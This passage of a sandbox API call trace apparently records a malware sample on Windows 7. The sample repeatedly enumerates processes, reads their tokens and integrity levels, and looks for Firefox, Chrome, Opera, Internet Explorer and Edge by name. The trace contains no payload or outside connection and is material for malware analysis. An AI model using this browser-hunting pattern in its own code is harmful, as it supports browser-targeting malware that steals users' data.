[0490.557] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0490.557] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0490.557] CloseHandle (hObject=0x3bc) returned 1 [0490.557] CloseHandle (hObject=0x5a4) returned 1 [0490.557] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0490.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0490.557] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376c90, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x92") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0490.557] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0490.557] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0490.558] GetLastError () returned 0x7a [0490.558] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0490.558] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0490.558] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0490.558] CloseHandle (hObject=0x3bc) returned 1 [0490.558] CloseHandle (hObject=0x5a4) returned 1 [0490.558] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0490.558] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0490.558] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0490.558] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0490.558] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0490.558] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0490.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0490.558] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0490.558] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0492.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa388) returned 0xc0000004 [0492.562] VirtualAlloc (lpAddress=0x0, dwSize=0xb388, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0492.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb388, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0492.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0492.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0492.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0492.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0492.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0492.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0492.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0492.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0492.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0492.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0492.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0492.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0492.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0492.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0492.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0492.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0492.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0492.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0492.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0492.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0492.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0492.563] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0492.563] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0492.563] GetLastError () returned 0x7a [0492.563] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0492.563] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0492.563] CloseHandle (hObject=0x3bc) returned 1 [0492.563] CloseHandle (hObject=0x5a4) returned 1 [0492.563] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0492.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0492.563] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x377da8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x93") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0492.563] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0492.563] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0492.563] GetLastError () returned 0x7a [0492.563] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0492.563] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0492.563] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0492.563] CloseHandle (hObject=0x3bc) returned 1 [0492.563] CloseHandle (hObject=0x5a4) returned 1 [0492.563] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0492.563] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0492.563] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0492.563] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0492.564] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0492.564] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0492.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0492.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0492.564] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0492.564] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0492.564] GetLastError () returned 0x7a [0492.564] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0492.564] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0492.564] CloseHandle (hObject=0x3bc) returned 1 [0492.564] CloseHandle (hObject=0x5a4) returned 1 [0492.564] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0492.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0492.564] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375ae0, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x94") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0492.564] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0492.564] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0492.564] GetLastError () returned 0x7a [0492.564] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0492.564] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0492.564] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0492.564] CloseHandle (hObject=0x3bc) returned 1 [0492.564] CloseHandle (hObject=0x5a4) returned 1 [0492.564] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0492.564] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0492.564] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0492.564] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0492.564] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0492.564] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0492.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0492.564] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0492.564] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0492.564] GetLastError () returned 0x7a [0492.564] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0492.564] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0492.564] CloseHandle (hObject=0x3bc) returned 1 [0492.564] CloseHandle (hObject=0x5a4) returned 1 [0492.564] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0492.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0492.564] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x3762a0, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x95") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0492.565] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0492.565] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0492.565] GetLastError () returned 0x7a [0492.565] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0492.565] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0492.565] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0492.565] CloseHandle (hObject=0x3bc) returned 1 [0492.565] CloseHandle (hObject=0x5a4) returned 1 [0492.565] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0492.565] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0492.565] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0492.565] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0492.565] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0492.565] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0492.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0492.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0492.565] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0492.565] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0492.565] GetLastError () returned 0x7a [0492.565] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0492.565] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0492.565] CloseHandle (hObject=0x3bc) returned 1 [0492.565] CloseHandle (hObject=0x5a4) returned 1 [0492.565] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0492.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0492.565] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x3768e8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x96") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0492.565] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0492.565] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0492.565] GetLastError () returned 0x7a [0492.565] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0492.565] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0492.565] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0492.565] CloseHandle (hObject=0x3bc) returned 1 [0492.565] CloseHandle (hObject=0x5a4) returned 1 [0492.565] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0492.565] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0492.565] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0492.565] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0492.565] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0492.565] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0492.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0492.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0492.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0492.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0492.566] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0492.566] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0492.566] GetLastError () returned 0x7a [0492.566] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0492.566] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0492.566] CloseHandle (hObject=0x3bc) returned 1 [0492.566] CloseHandle (hObject=0x5a4) returned 1 [0492.566] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0492.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0492.566] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376c90, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x97") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0492.566] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0492.566] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0492.566] GetLastError () returned 0x7a [0492.566] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0492.566] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0492.566] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0492.566] CloseHandle (hObject=0x3bc) returned 1 [0492.566] CloseHandle (hObject=0x5a4) returned 1 [0492.566] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0492.566] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0492.566] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0492.566] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0492.566] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0492.566] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0492.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0492.566] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0492.567] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0494.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa388) returned 0xc0000004 [0494.580] VirtualAlloc (lpAddress=0x0, dwSize=0xb388, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0494.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb388, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0494.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0494.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0494.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0494.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0494.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0494.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0494.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0494.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0494.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0494.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0494.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0494.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0494.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0494.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0494.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0494.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0494.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0494.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0494.583] OpenProcess 